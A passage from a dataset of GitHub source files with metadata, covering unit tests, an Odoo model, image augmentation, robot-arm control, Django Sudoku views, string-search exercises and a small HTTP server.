StringIO()\n osaca.run(args, output_file=output)\n # WARNING for length\n self.assertTrue(\n output.getvalue().count(\n \"WARNING: You are analyzing a large amount of instruction forms\"\n )\n == 1\n )\n # WARNING for arch\n args = parser.parse_args(\n [\"--lines\", \"100-199\", \"--ignore-unknown\", self._find_test_file(kernel)]\n )\n output = StringIO()\n osaca.run(args, output_file=output)\n self.assertTrue(\n output.getvalue().count(\"WARNING: No micro-architecture was specified\") == 1\n )\n # WARNING for timeout\n args = parser.parse_args(\n [\"--ignore-unknown\", \"--lcd-timeout\", \"0\", self._find_test_file(kernel)]\n )\n output = StringIO()\n osaca.run(args, output_file=output)\n self.assertTrue(output.getvalue().count(\"WARNING: LCD analysis timed out\") == 1)\n args = parser.parse_args(\n [\"--ignore-unknown\", \"--lcd-timeout\", \"-1\", self._find_test_file(kernel)]\n )\n output = StringIO()\n osaca.run(args, output_file=output)\n self.assertTrue(output.getvalue().count(\"WARNING: LCD analysis timed out\") == 0)\n\n def test_lines_arg(self):\n # Run tests with --lines option\n parser = osaca.create_parser()\n kernel_x86 = \"triad_x86_iaca.s\"\n args_base = parser.parse_args([\"--arch\", \"csx\", self._find_test_file(kernel_x86)])\n output_base = StringIO()\n osaca.run(args_base, output_file=output_base)\n output_base = output_base.getvalue().split(\"\\n\")[8:]\n args = []\n args.append(\n parser.parse_args(\n [\n \"--lines\",\n \"146-154\",\n \"--arch\",\n \"csx\",\n self._find_test_file(kernel_x86),\n ]\n )\n )\n args.append(\n parser.parse_args(\n [\n \"--lines\",\n \"146:154\",\n \"--arch\",\n \"csx\",\n self._find_test_file(kernel_x86),\n ]\n )\n )\n args.append(\n parser.parse_args(\n [\n \"--lines\",\n \"146,147:148,149-154\",\n \"--arch\",\n \"csx\",\n self._find_test_file(kernel_x86),\n ]\n )\n )\n for a in args:\n with self.subTest(params=a):\n output = StringIO()\n osaca.run(a, output_file=output)\n self.assertEqual(output.getvalue().split(\"\\n\")[8:], output_base)\n\n ##################\n # Helper functions\n ##################\n\n @staticmethod\n def _find_file(kernel, arch, comp):\n testdir = os.path.dirname(__file__)\n name = os.path.join(\n testdir,\n \"../examples\",\n kernel,\n kernel + \".s.\" + arch[:3].lower() + \".\" + comp.lower() + \".s\",\n )\n if kernel == \"j2d\" and arch.lower() == \"csx\":\n name = name[:-1] + \"AVX.s\"\n assert os.path.exists(name)\n return name\n\n @staticmethod\n def _find_test_file(name):\n testdir = os.path.dirname(__file__)\n name = os.path.join(testdir, \"test_files\", name)\n assert os.path.exists(name)\n return name\n\n\nif __name__ == \"__main__\":\n suite = unittest.TestLoader().loadTestsFromTestCase(TestCLI)\n unittest.TextTestRunner(verbosity=2, buffer=True).run(suite)\n","repo_name":"RRZE-HPC/OSACA","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":10452,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"53"} +{"seq_id":"9889928847","text":"import logging\n\nfrom dagster import AssetKey, DagsterInstance, observable_source_asset\nfrom dagster._core.definitions.asset_daemon_context import (\n AssetDaemonContext,\n get_auto_observe_run_requests,\n)\nfrom dagster._core.definitions.asset_daemon_cursor import AssetDaemonCursor\nfrom dagster._core.definitions.asset_graph import AssetGraph\nfrom pytest import fixture\n\n\ndef test_single_observable_source_asset_no_auto_observe():\n @observable_source_asset\n def asset1():\n ...\n\n asset_graph = AssetGraph.from_assets([asset1])\n\n assert (\n len(\n get_auto_observe_run_requests(\n asset_graph=asset_graph,\n current_timestamp=1000,\n last_observe_request_timestamp_by_asset_key={},\n run_tags={},\n )\n )\n == 0\n )\n\n assert (\n len(\n get_auto_observe_run_requests(\n asset_graph=asset_graph,\n current_timestamp=1000,\n last_observe_request_timestamp_by_asset_key={AssetKey(\"asset1\"): 1},\n run_tags={},\n )\n )\n == 0\n )\n\n\n@fixture\ndef single_auto_observe_source_asset_graph():\n @observable_source_asset(auto_observe_interval_minutes=30)\n def asset1():\n ...\n\n asset_graph = AssetGraph.from_assets([asset1])\n return asset_graph\n\n\ndef test_single_observable_source_asset_no_prior_observe_requests(\n single_auto_observe_source_asset_graph,\n):\n run_requests = get_auto_observe_run_requests(\n asset_graph=single_auto_observe_source_asset_graph,\n current_timestamp=1000,\n last_observe_request_timestamp_by_asset_key={},\n run_tags={},\n )\n assert len(run_requests) == 1\n run_request = run_requests[0]\n assert run_request.asset_selection == [AssetKey(\"asset1\")]\n\n\ndef test_single_observable_source_asset_prior_observe_requests(\n single_auto_observe_source_asset_graph,\n):\n last_timestamp = 1000\n\n run_requests = get_auto_observe_run_requests(\n asset_graph=single_auto_observe_source_asset_graph,\n current_timestamp=last_timestamp + 30 * 60 + 5,\n last_observe_request_timestamp_by_asset_key={AssetKey(\"asset1\"): last_timestamp},\n run_tags={},\n )\n assert len(run_requests) == 1\n run_request = run_requests[0]\n assert run_request.asset_selection == [AssetKey(\"asset1\")]\n\n\ndef test_single_observable_source_asset_prior_recent_observe_requests(\n single_auto_observe_source_asset_graph,\n):\n last_timestamp = 1000\n\n run_requests = get_auto_observe_run_requests(\n asset_graph=single_auto_observe_source_asset_graph,\n current_timestamp=last_timestamp + 30 * 60 - 5,\n last_observe_request_timestamp_by_asset_key={AssetKey(\"asset1\"): last_timestamp},\n run_tags={},\n )\n assert len(run_requests) == 0\n\n\ndef test_reconcile():\n @observable_source_asset(auto_observe_interval_minutes=30)\n def asset1():\n ...\n\n asset_graph = AssetGraph.from_assets([asset1])\n instance = DagsterInstance.ephemeral()\n\n run_requests, cursor, _ = AssetDaemonContext(\n evaluation_id=1,\n auto_observe=True,\n asset_graph=asset_graph,\n target_asset_keys=set(),\n instance=instance,\n cursor=AssetDaemonCursor.empty(),\n materialize_run_tags=None,\n observe_run_tags={\"tag1\": \"tag_value\"},\n respect_materialization_data_versions=False,\n logger=logging.getLogger(\"dagster.amp\"),\n ).evaluate()\n assert len(run_requests) == 1\n assert run_requests[0].tags.get(\"tag1\") == \"tag_value\"\n assert run_requests[0].asset_selection == [AssetKey([\"asset1\"])]\n assert cursor.last_observe_request_timestamp_by_asset_key[AssetKey([\"asset1\"])] > 0\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster_tests/definitions_tests/auto_materialize_tests/test_auto_observe.py","file_name":"test_auto_observe.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"8386116739","text":"import allure\nimport moment\nimport pytest\n\nfrom pages.homePage import HomePage\nfrom pages.loginPage import LoginPage\nfrom utils import utils\n\n\n@pytest.mark.usefixtures(\"test_setup\")\n\n\nclass TestLogin():\n\n # @pytest.fixture(scope='session') #run before all the test\n\n def test_login(self):\n #driver.get(\"https://opensource-demo.orangehrmlive.com\")\n driver = self.driver\n driver.get(utils.URL)\n login = LoginPage(driver)\n login.enter_username(utils.USERNAME)\n login.enter_password(utils.PASSWORD)\n login.click_login()\n # driver.find_element_by_id(\"txtUsername\").send_keys(\"Admin\")\n # driver.find_element_by_id(\"txtPassword\").send_keys(\"admin123\")\n # driver.find_element_by_id(\"btnLogin\").click()\n\n def test_logout(self):\n try:\n driver = self.driver\n logout = HomePage(driver)\n logout.click_welcome()\n logout.click_logout()\n x = driver.title\n assert x == \"OrangeHRM\"\n except AssertionError as error:\n print(\"Assertion error has occurred\")\n print(error)\n currentTime = moment.now().strftime(\"%H-%M-%S_%d-%m-%y\")\n testname = utils.whoami()\n screenshotname = testname+\"_\"+currentTime\n allure.attach(self.driver.get_screenshot_as_png(),name=screenshotname,\n attachment_type=allure.attachment_type.PNG)\n driver.get_screenshot_as_file(\"C:/Users/sujan/PycharmProjects/POM-Projects/Aumation_Frame_Work1/screenshots/\"+screenshotname+\".PNG\")\n raise\n except:\n print(\"There was as exception\")\n raise\n else:\n print(\"No exception occure\")\n finally:\n print(\"I am inside the finally block\")\n\n # driver.find_element_by_id(\"welcome\").click()\n # driver.find_element_by_link_text(\"Logout\").click()\n","repo_name":"sujaniw-spec/PythonAumation_Frame_Work1","sub_path":"tests/login_test.py","file_name":"login_test.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35917115348","text":"from odoo import _, api, fields, models\nfrom odoo.exceptions import ValidationError\n\n\nclass StockPicking(models.Model):\n _name = \"stock.picking\"\n _inherit = [\"stock.picking\", \"phone.validation.mixin\"]\n\n cost = fields.Float(string=\"Cost\")\n np_shipping_weight = fields.Float(string=\"Shipping Weight\")\n np_shipping_volume = fields.Float(string=\"Shipping Volume\", digits=(10, 4))\n np_length = fields.Integer(\n string=\"Length (cm)\",\n help=\"The cargo length (cm)\",\n )\n np_width = fields.Integer(\n string=\"Width (cm)\",\n help=\"The cargo width (cm)\",\n )\n np_height = fields.Integer(\n string=\"Height (cm)\",\n help=\"The cargo height (cm)\",\n )\n comment = fields.Text(related=\"sale_id.note\", string=\"Comment\")\n afterpayment_check = fields.Boolean(string=\"Afterpayment check\", default=False)\n\n biko_recipient_id = fields.Many2one(\n \"res.partner\",\n string=\"Recipient person\",\n store=True,\n compute=\"_compute_biko_recipient_id\",\n inverse=\"_inverse_biko_recipient_id\",\n )\n biko_recipient_mobile = fields.Char(\n string=\"Mobile\",\n related=\"biko_recipient_id.mobile\",\n readonly=False,\n )\n\n biko_1c_phone = fields.Char(\n string=\"1C phone\",\n related=\"biko_recipient_id.biko_1c_phone\",\n )\n\n biko_dropshipping = fields.Boolean(string=\"Dropshipping\")\n\n biko_carrier_id = fields.Many2one(\n \"delivery.carrier\",\n string=\"Delivery carrier\",\n # store=True,\n readonly=True,\n related=\"sale_id.carrier_id\",\n )\n\n def _inverse_biko_recipient_id(self):\n for stock in self:\n if stock.sale_id:\n sale_order = stock.sale_id\n sale_order.update({\"biko_recipient_id\": stock.biko_recipient_id})\n\n @api.onchange(\"biko_recipient_mobile\")\n def _onchange_phone_validation(self):\n if self.biko_recipient_mobile:\n self.biko_recipient_mobile = self.phone_format(self.biko_recipient_mobile)\n\n @api.depends(\"sale_id\")\n def _compute_biko_recipient_id(self):\n for stock in self:\n stock.update({\"biko_recipient_id\": stock.sale_id.biko_recipient_id})\n\n @api.constrains(\"afterpayment_check\", \"backward_money\")\n def _check_backward(self):\n for data in self:\n if data.backward_money and data.afterpayment_check:\n raise ValidationError(\n _(\n \"You can choose only single option, \"\n '\"Backward\" or \"After payment\".'\n )\n )\n","repo_name":"BorovlevAS/muztorg","sub_path":"biko_np_patch/models/stock_picking.py","file_name":"stock_picking.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15029784525","text":"import matplotlib as mpl\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport pickle as pkl\n\nNULL = object()\n\ndef plot_2d(preds, shape, mask=NULL, clim=2, cbar=True):\n bounds_x1 = (-8, +8)\n bounds_x2 = (-2, +20)\n minima, maxima = -clim, +clim\n norm = mpl.colors.Normalize(vmin=minima, vmax=maxima, clip=False)\n cmap = cm.bwr\n cmap.set_bad(color='gray')\n mapper = cm.ScalarMappable(norm=norm, cmap=cmap)\n if mask is not NULL:\n preds = preds.copy()\n preds[~mask] = np.nan\n plt.imshow(preds.reshape(*(shape[::-1])),\n origin='lower',\n cmap=cmap, norm=norm,\n extent=(*bounds_x1, *bounds_x2),\n )\n plt.gca().invert_yaxis()\n if cbar:\n plt.colorbar()\n plt.axhline(0, color='k', linewidth=0.5)\n plt.axvline(0, color='k', linewidth=0.5)\n plt.xticks([-5, 0, +5])\n plt.yticks([0, 5, 10, 15, 20])\n return plt\n\n\n\nest_dir = '../pipeline-gridded/Estimates/'\npredmat = pkl.load(open(f'{est_dir}/TPS_Preds_Block_0.5_Hur.pkl', 'rb'))\nshape = (100, 400)\n\ndepth_idx = 3\nplot_2d(predmat[:, depth_idx], shape, cbar=False)\nplt.savefig('test.pdf', bbox_inches='tight')\n\n","repo_name":"jacoposala29/ARGO_code_JS","sub_path":"Codes_pipeline/implementations/plot_sample.py","file_name":"plot_sample.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39424678941","text":"from PIL import Image, ImageEnhance\r\nimport os\r\nimport random\r\nimport time\r\n\r\nimage_path = \"large.jpg\"\r\nimage = Image.open(image_path)\r\n\r\nsize = (32, 32)\r\nimage = image.resize(size)\r\n# Define the augmentation parameters\r\nrotation_angles = [-15, -10, -5, 0, 5, 10, 15]\r\nbrightness_factors = [0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3]\r\ncontrast_factors = [0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3]\r\n\r\n# Create the output directory\r\noutput_dir = \"augmented_images\"\r\nif not os.path.exists(output_dir):\r\n os.makedirs(output_dir)\r\n# Apply the augmentations and save the resulting images\r\nfor i in range(200):\r\n # Randomly select the augmentation parameters\r\n rotation_angle = random.choice(rotation_angles)\r\n brightness_factor = random.choice(brightness_factors)\r\n contrast_factor = random.choice(contrast_factors)\r\n # Apply the augmentations\r\n augmented_image = image.rotate(rotation_angle)\r\n augmented_image = ImageEnhance.Brightness(augmented_image).enhance(brightness_factor)\r\n augmented_image = ImageEnhance.Contrast(augmented_image).enhance(contrast_factor)\r\n # Save the resulting image with a timestamp in the filename\r\n timestamp = time.strftime(\"%Y%m%d_%H%M%S\")\r\n output_path = os.path.join(output_dir, f\"augmented_image_{i}_{timestamp}.jpg\")\r\n augmented_image.save(output_path)\r\n","repo_name":"seriousGOODMAN/ADAS-Projects","sub_path":"imageAUG.py","file_name":"imageAUG.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72567420967","text":"from serial.tools import list_ports\nimport threading\nimport time\nfrom pydobot import Dobot\n\nport = list_ports.comports()[0].device\ndevice = Dobot(port=port, verbose=False)\nstate = True\ndef job():\n global state\n while(state):\n print(device.pose())\n time.sleep(0.01)\nt = threading.Thread(target = job)\n\n# 執行該子執行緒\n\n(x, y, z, r, j1, j2, j3, j4) = device.pose()\n#print(f'x:{x} y:{y} z:{z} j1:{j1} j2:{j2} j3:{j3} j4:{j4}')\nt.start()\nfor i in range(1):\n device.move_to(x+100 , y, z, r, wait=False)\n device.move_to(x, y, z, r, wait=True) # we wait until this movement is done before continuing\n #device.move_to(x , y + 40, z, r, wait=True) # we wait until this movement is done before continuing\n #device.move_to(x , y, z, r, wait=False)\n #device.move_to()\nstate = False\nt.join()\ndevice.close()\n\nprint(\"Done.\")","repo_name":"harry123180/opencv_find_objects","sub_path":"GMTCV/單一動作.py","file_name":"單一動作.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1672581409","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport json\nimport random\nfrom math import sqrt\n\nfrom django.http import JsonResponse, Http404\nfrom django.views.generic.base import TemplateView\nfrom django.template.loader import render_to_string\n\nfrom common.checker import Checker\nfrom play.models import Puzzle, PuzzleValue\n\n\nclass PlayView(TemplateView):\n \"\"\"Django class-based view for playing Sudoku.\"\"\"\n\n template_name = 'play/play.html'\n puzzle_id = None\n\n def __init__(self, **kwargs):\n \"\"\"Initialize a new `PlayView` instance.\"\"\"\n super(PlayView, self).__init__(**kwargs)\n\n def get(self, request, *args, **kwargs):\n \"\"\"Render `PlayView` instance.\"\"\"\n context = self.get_context_data(**kwargs)\n return self.render_to_response(context)\n\n def get_context_data(self, **kwargs):\n \"\"\"Get context data for new puzzles.\"\"\"\n\n # If we have an ID from the get request, use that.\n # Otherwise get a random puzzle.\n puzzle_id = self.kwargs.get('puzzle_id', None)\n if puzzle_id is None:\n # Get a random Puzzle id from the DB\n puzzle_id = self._get_random_puzzle()\n\n # return the puzzle once we get and format its context from the DB.\n return self._build_puzzle(puzzle_id)\n\n def _get_random_puzzle(self, difficulty=None):\n \"\"\"Get a random Puzzle id from the DB\"\"\"\n available_puzzles = Puzzle.objects.get_total_values(difficulty)\n if not available_puzzles:\n available_puzzles = Puzzle.objects.all()\n last = available_puzzles.count() - 1\n puzzle_id = random.randint(0, last)\n try:\n return available_puzzles[int(puzzle_id)]\n except IndexError:\n raise Http404(\"Sorry, that puzzle doesn't exist.\")\n\n def _build_puzzle(self, db_puzzle):\n \"\"\"\n Fetch a puzzle from the DB based on ID.\n Then format the output so the template can understand it.\n \"\"\"\n\n # Load blank puzzle then replace it with the values of the loaded puzzle\n values = PuzzleValue.objects.filter(puzzle__id=db_puzzle.id)\n puzzle = []\n for y in range(db_puzzle.height):\n row = []\n for x in range(db_puzzle.width):\n row.append(0)\n puzzle.append(row)\n for value in values:\n puzzle[value.y_cord][value.x_cord] = value.value\n\n # Try to get locations of where to draw thick borders, 404 otherwise.\n try:\n width_border = [x*int(sqrt(len(puzzle[0]))) for x in range(int(sqrt(len(puzzle[0]))))]\n height_border = [x*int(sqrt(len(puzzle))) for x in range(int(sqrt(len(puzzle))))]\n except IndexError:\n raise Http404(\"Sorry, the puzzle u request isn't valid.\")\n\n return {\n 'puzzle': puzzle,\n 'puzzle_id': db_puzzle.pk,\n 'width_border': width_border,\n 'height_border': height_border,\n }\n\n\nclass APIView(PlayView):\n \"\"\"Django class-based view for the ajax api.\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Initialize a new `APIView` instance.\"\"\"\n super(APIView, self).__init__(**kwargs)\n\n def get(self, request, *args, **kwargs):\n \"\"\"Return `APIView` json.\"\"\"\n context = self.get_context_data(request, **kwargs)\n return JsonResponse(context)\n\n def get_context_data(self, request, **kwargs):\n \"\"\"Get context function for the api.\"\"\"\n action = request.GET.get('action', None)\n\n board_html = ''\n checked = ''\n\n # if the action is new, return a new Sudoku puzzle.\n # Otherwise, check the current puzzle and return the result of the check.\n if action == 'new':\n difficulty = request.GET.get('difficulty', None)\n puzzle_data = self._build_puzzle(self._get_random_puzzle(difficulty))\n board_html = render_to_string('play/board.html', puzzle_data)\n else:\n puzzle = json.loads(request.GET.get('puzzle', None))\n checked = self._check_puzzle(puzzle)\n\n context = {\n 'result': checked,\n 'board_html': board_html,\n }\n\n return context\n\n def _check_puzzle(self, puzzle):\n \"\"\"Check the puzzle and return its status\"\"\"\n if puzzle:\n # First, check if the puzzle is complete and correct.\n checked = Checker(puzzle).validate()\n if not checked:\n # If the puzzle is not complete or not correct,\n # Check to see if it's correct while being incomplete.\n checked = Checker(puzzle, True).validate()\n if checked:\n # return problem, if the puzzle is not complete but correct.\n checked = 'ok'\n else:\n # return problem, if the puzzle is not correct.\n checked = 'problem'\n else:\n # return complete, if the puzzle is complete and correct.\n checked = 'complete'\n else:\n # return error, if the function got None for the puzzle\n checked = 'error'\n\n return checked\n\n","repo_name":"RyanNoelk/Sudoku","sub_path":"play/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73953931369","text":"\n\n# O(n*m); O(1)\ndef implementStr(haystack, needle):\n if not needle: return 0\n left, right = 0, len(needle)\n\n while right < len(haystack):\n if haystack[left:right] == needle:\n return left\n left, right = left + 1, right + 1\n\n return False, -1\n\n\n# print(implementStr(\"hello\", \"ll\"))\n\n\n# O(n+m) || O(m) n is main string and m is the substring\ndef KMP(string, substring):\n haystack = string\n needle = substring\n if needle == \"\": return 0\n lps = [0] * len(needle)\n \n prevLPS, i = 0, 1\n while i < len(needle):\n if needle[i] == needle[prevLPS]:\n lps[i] = prevLPS + 1\n prevLPS += 1\n i += 1\n elif prevLPS == 0:\n lps[i] = 0\n i += 1\n else:\n prevLPS = lps[prevLPS - 1]\n \n i = 0 # ptr for haystack\n j = 0 # ptr for needle\n while i < len(haystack):\n if haystack[i] == needle[j]:\n i, j = i + 1, j + 1\n else:\n if j == 0:\n i += 1\n else:\n j = lps[j - 1]\n if j == len(needle):\n return i - len(needle)\n return -1\n\n # if not substring: return 0\n # i, j = 0, 0\n # lps = buildPattern(substring)\n # while i < len(string):\n # if string[i] == string[j]:\n # i += 1\n # j += 1\n # else:\n # if j == 0:\n # i += 1\n # else:\n # j = lps[j-1]\n \n # if j == len(substring):\n # return i - len(substring)\n\n # return -1\n \ndef buildPattern(substring):\n lps = [0] * len(substring)\n \n prevLPS, i = 0, 1\n while i < len(substring):\n if substring[i] == substring[prevLPS]:\n lps[i] = prevLPS + 1\n prevLPS += 1\n i += 1\n elif prevLPS == 0:\n lps[i] = 0\n i += 1\n else:\n prevLPS = lps[prevLPS - 1]\n \n return lps\n\n # lps = [0] * len(string)\n\n # prevLps, i = 0, 1\n\n # while i < len(substring):\n # if substring[i] == substring[prevLps]:\n # lps[i] = prevLps + 1\n # prevLps += 1\n # i += 1\n # elif prevLps == 0:\n # lps[i] = 0\n # i += 1\n # else:\n # prevLps = lps[prevLps - 1]\n \n \n\n\nprint(KMP('hello', 'll'))\nprint(KMP('a', 'a'))\n","repo_name":"ArshErgon/Leetcode-Question-Solution","sub_path":"LeetCode/easy/implementStrStr.py","file_name":"implementStrStr.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11299160671","text":"#Melhore o DESAFIO 061, perguntando para o usuário se ele\n# quer mostrar mais alguns termos. O programa\n# encerrará quando ele disser que quer mostrar 0 termos#\nprimeiro = int(input('digite o primeiro termo: '))\nrazao = int(input('digite a razao: '))\ntermo = primeiro\ncont = 1\ntotal = 0\nmais = 10\nwhile mais != 0:\n total = total + mais\n while cont <= total:\n print('{} ->'.format(termo), end='')\n termo += razao\n cont += 1\n print('pausa')\n mais = int(input('quantos trmos vc deseja mostrar a mais: [0] para sair'))\nprint('FIM')\nprint('voce digitou ao total {} termos'.format(total))","repo_name":"LindomarB/Curso-em-video-python-git","sub_path":"pythonexercicios/ex062 super p.a.py","file_name":"ex062 super p.a.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13917439931","text":"_base_ = ['../_base_/torchscript_config.py', '../_base_/backends/coreml.py']\n\ncodebase_config = dict(type='mmpretrain', task='Classification')\n\nbackend_config = dict(model_inputs=[\n dict(\n input_shapes=dict(\n input=dict(\n min_shape=[1, 3, 224, 224],\n max_shape=[8, 3, 224, 224],\n default_shape=[1, 3, 224, 224])))\n])\n","repo_name":"open-mmlab/mmdeploy","sub_path":"configs/mmpretrain/classification_coreml_dynamic-224x224-224x224.py","file_name":"classification_coreml_dynamic-224x224-224x224.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"20000205076","text":"from http.server import HTTPServer, BaseHTTPRequestHandler\n\nclass GetHandler(BaseHTTPRequestHandler):\n def do_GET(self):\n self.send_response(200)\n self.send_header('Content-Type', 'text-html')\n self.end_headers()\n greeting = \"Hello Emerging Tech Valencia!!\\n\"\n self.wfile.write(greeting.encode())\n return\n\ntry:\n server = HTTPServer(('0.0.0.0', 8080), GetHandler)\n server.serve_forever()\n\nexcept KeyboardInterrupt:\n print(\"Shutting down web server\")\n server.socket.close()","repo_name":"mvazquezc/meetup-pyapp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20611491441","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport pytest\nfrom six.moves import mock\nimport tensorflow as tf\n\nfrom nvidia_tao_tf1.core.coreobject import deserialize_tao_object\nfrom nvidia_tao_tf1.core.processors import RandomRotation\nfrom nvidia_tao_tf1.core.processors.augment.spatial import rotation_matrix\nfrom nvidia_tao_tf1.core.types import Canvas2D, Transform\n\n\n@pytest.mark.parametrize(\n \"probability, message\",\n [\n (-0.1, \"RandomRotation.probability (-0.1) is not within the range [0.0, 1.0].\"),\n (1.1, \"RandomRotation.probability (1.1) is not within the range [0.0, 1.0].\"),\n ],\n)\ndef test_raises_on_invalid_probability(probability, message):\n with pytest.raises(ValueError) as exc:\n RandomRotation(min_angle=7, max_angle=7, probability=probability)\n assert str(exc.value) == message\n\n\n@pytest.mark.parametrize(\n \"min_angle, message\",\n [\n (-600, \"RandomRotation.min_angle (-600) is smaller than -360.0 degrees.\"),\n (\n 8,\n \"RandomRotation.min_angle (8) is greater than RandomRotation.max_angle (7).\",\n ),\n ],\n)\ndef test_raises_on_invalid_min_angle(min_angle, message):\n with pytest.raises(ValueError) as exc:\n RandomRotation(min_angle=min_angle, max_angle=7, probability=0.5)\n assert str(exc.value) == message\n\n\n@pytest.mark.parametrize(\n \"max_angle, message\",\n [(361, \"RandomRotation.max_angle (361) is greater than 360.0 degrees.\")],\n)\ndef test_raises_on_invalid_max_angle(max_angle, message):\n with pytest.raises(ValueError) as exc:\n RandomRotation(min_angle=7, max_angle=max_angle, probability=0.5)\n assert str(exc.value) == message\n\n\n@mock.patch(\"nvidia_tao_tf1.core.processors.augment.random_rotation.tf.random.uniform\")\n@mock.patch(\"nvidia_tao_tf1.core.processors.augment.random_rotation.spatial.rotation_matrix\")\ndef test_delegates_random_angle_to_rotation_matrix(\n mocked_rotation_matrix, mocked_random_uniform\n):\n \"\"\"Test RandomRotation processor call.\"\"\"\n transform = Transform(\n canvas_shape=Canvas2D(height=12, width=10),\n color_transform_matrix=tf.eye(4),\n spatial_transform_matrix=tf.eye(3),\n )\n mocked_rotation_matrix.return_value = tf.eye(3)\n seven = tf.constant(7.0, dtype=tf.float32)\n mocked_random_uniform.return_value = seven\n\n processor = RandomRotation(min_angle=40, max_angle=90, probability=1.0)\n processor(transform)\n mocked_rotation_matrix.assert_called_with(seven, height=12, width=10)\n\n\n@mock.patch(\"nvidia_tao_tf1.core.processors.augment.random_rotation.tf.random.uniform\")\n@pytest.mark.parametrize(\n \"batch_size\", [None, 3, tf.compat.v1.placeholder(dtype=tf.int32)]\n)\ndef test_random_rotation(mocked_random_uniform, batch_size):\n \"\"\"Test RandomRotation processor.\"\"\"\n batch_shape = [] if batch_size is None else [batch_size]\n transform = Transform(\n canvas_shape=Canvas2D(height=12, width=10),\n color_transform_matrix=tf.eye(4, batch_shape=batch_shape, dtype=tf.float32),\n spatial_transform_matrix=tf.eye(3, batch_shape=batch_shape, dtype=tf.float32),\n )\n\n feed_dict = {}\n if type(batch_size) == tf.Tensor:\n feed_dict = {batch_size: 7}\n\n rnd = tf.fill(dims=batch_shape, value=0.5)\n mocked_random_uniform.return_value = rnd\n\n processor = RandomRotation(min_angle=40, max_angle=90, probability=1.0)\n stm = processor(transform)\n\n expected_stm = rotation_matrix(rnd, 10, 12)\n if batch_size is None:\n assert expected_stm.shape.ndims == 2\n else:\n assert expected_stm.shape.ndims == 3\n stm, expected_stm = tf.compat.v1.Session().run(\n [stm.spatial_transform_matrix, expected_stm], feed_dict=feed_dict\n )\n np.testing.assert_equal(stm, expected_stm)\n\n\ndef test_serialization_and_deserialization():\n \"\"\"Test that it is a MaglevObject that can be serialized and deserialized.\"\"\"\n processor = RandomRotation(min_angle=40, max_angle=90, probability=1.0)\n processor_dict = processor.serialize()\n deserialized_processor = deserialize_tao_object(processor_dict)\n assert processor._min_angle == deserialized_processor._min_angle\n assert processor._max_angle == deserialized_processor._max_angle\n assert processor._probability == deserialized_processor._probability\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/core/processors/augment/test_random_rotation.py","file_name":"test_random_rotation.py","file_ext":"py","file_size_in_byte":4365,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"9322476037","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\n\r\ndef compute(input1, input2,input3,input4,input5):\r\n \r\n# num_companies = 50\r\n# profession_options = ['Film and television', 'Visual arts', 'Fashion and beauty', 'Architect', 'Interior designer']\r\n# num_hashtags_per_profession = 10\r\n# companies = pd.DataFrame(columns=['username', 'hashtags', 'profession', 'experience_level', 'location'])\r\n\r\n# for i in range(num_companies):\r\n# # Randomly choose up to two professions for the company\r\n# professions = np.random.choice(profession_options, size=np.random.randint(1, 3), replace=False)\r\n# professions_str = ', '.join(professions)\r\n# # Generate a hashtag vector with 50 bits\r\n# hashtags = np.zeros(50)\r\n# for profession in professions:\r\n# # Find the index of the profession in the profession_options list\r\n# profession_index = profession_options.index(profession)\r\n# # Set the corresponding 10 bits to 1 for the profession\r\n# hashtags[profession_index*num_hashtags_per_profession:(profession_index+1)*num_hashtags_per_profession] = 1\r\n# companies.loc[i] = ['company' + str(i), hashtags.astype(int).tolist(), professions_str,\r\n# np.random.randint(1, 6), 'location' + str(np.random.randint(1, 6))]\r\n\r\n hashtags = ['#filmmaking', '#television', '#cinema', '#filmproduction', '#acting', '#screenwriting','#act','#direct','#shortfilm','#cinematography',\r\n '#design', '#graphicdesign', '#drawing', '#sculpture', '#photography', '#printmaking', '#visualarts','#mixedmedia','#gallery','#illustrations','#sketch',\r\n '#fashion', '#beauty', '#style', '#modeling', '#makeup', '#designer', '#fashionista','#streetstyle','#accessories','#nails',\r\n '#architecture', '#construction', '#building', '#architecturaldesign', '#urbanplanning','#modern' ,'#historic','#landscape','#monument',\r\n '#interiordesign', 